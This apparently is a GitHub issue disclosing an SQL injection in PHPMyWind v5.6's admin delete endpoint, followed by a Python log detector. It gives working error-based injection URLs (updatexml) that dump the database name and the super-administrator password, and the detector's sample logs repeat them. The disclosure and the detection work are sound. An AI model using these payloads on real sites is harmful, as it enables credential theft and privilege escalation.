SQL injection exists in many places in PHPMyWind v5.6 #10

Open
@songxpu

Product Homepage: http://phpmywind.com/
Hello!
I found a serious SQL injection vulnerability in the backend management system (/admin/admin_save.php) of PHPMyWind v5.6.

This vulnerability allows low-privilege site administrators to gain access to super-administrator accounts and passwords.

Vulnerability validation:
First, there are three types of administrators in the current system: super administrators, site administrators, and article publishers.

Now log in to the background management system as a site administrator and click the administrator management; the "delete function" is the location of the vulnerability.

Its URL is http://127.0.0.1/admin/admin_save.php?action=del&id=4
POC
(1)
http://127.0.0.1/admin/admin_save.php?action=del&id=4%27

(2) Show the current database

http://127.0.0.1/admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`))

(3) Query out the super administrator password

http://127.0.0.1/admin/admin_save.php?action=del&id=4  and id in (char(@`'`),updatexml(1,concat(0x7e,(select password from pmw_admin limit 0,1)),1),char(@`'`))

This vulnerability allows you to query the database for any data you want.
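
For defenders reviewing web server logs, the requests in this report stand out because the `id` parameter of the delete action is not a plain integer. The following detection sketch is an added example, not part of the original issue or of PHPMyWind's code; the combined log format, the sample log lines and the function names `classify` and `scan` are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs

TARGET_PATH = "/admin/admin_save.php"   # endpoint named in the report
REQUEST = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+"')
INTEGER = re.compile(r"[0-9]{1,10}")     # what a record id should look like
ERROR_BASED = re.compile(r"updatexml\s*\(", re.I)  # function used in the PoC

def classify(line):
    """Return None for benign/unrelated lines, else a verdict string."""
    m = REQUEST.search(line)
    if not m:
        return None
    url = urlsplit(m.group(1))
    if url.path != TARGET_PATH:
        return None
    params = parse_qs(url.query, keep_blank_values=True)  # percent-decodes values
    if params.get("action") != ["del"]:
        return None
    bad = [v for v in params.get("id", []) if not INTEGER.fullmatch(v)]
    if not bad:
        return None
    if any(ERROR_BASED.search(v) for v in bad):
        return "error-based-sqli"
    return "non-integer-id"

def scan(lines):
    """Return (line_number, verdict) for every flagged line."""
    hits = []
    for n, line in enumerate(lines, 1):
        verdict = classify(line)
        if verdict:
            hits.append((n, verdict))
    return hits

# Constructed sample log lines (assumed combined log format); the request
# paths reuse the URLs quoted in the report.
SAMPLE = [
    '10.0.0.5 - - [01/Jan/2024:10:00:00 +0000] "GET /admin/admin_save.php?action=del&id=4 HTTP/1.1" 200 512',
    '10.0.0.5 - - [01/Jan/2024:10:00:09 +0000] "GET /admin/admin_save.php?action=del&id=4%27 HTTP/1.1" 200 98',
    '10.0.0.5 - - [01/Jan/2024:10:00:31 +0000] "GET /admin/admin_save.php?action=del&id=4%20%20and%20id%20in%20(char(@`%27`),updatexml(1,concat(0x7e,(select%20database())),1),char(@`%27`)) HTTP/1.1" 200 140',
    '10.0.0.7 - - [01/Jan/2024:10:01:02 +0000] "GET /index.php?id=4%27 HTTP/1.1" 200 2048',
]

if __name__ == "__main__":
    for n, verdict in scan(SAMPLE):
        print(n, verdict)
```

The same integer-only rule is what the server-side handler should enforce on `id` before the value reaches any SQL statement.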
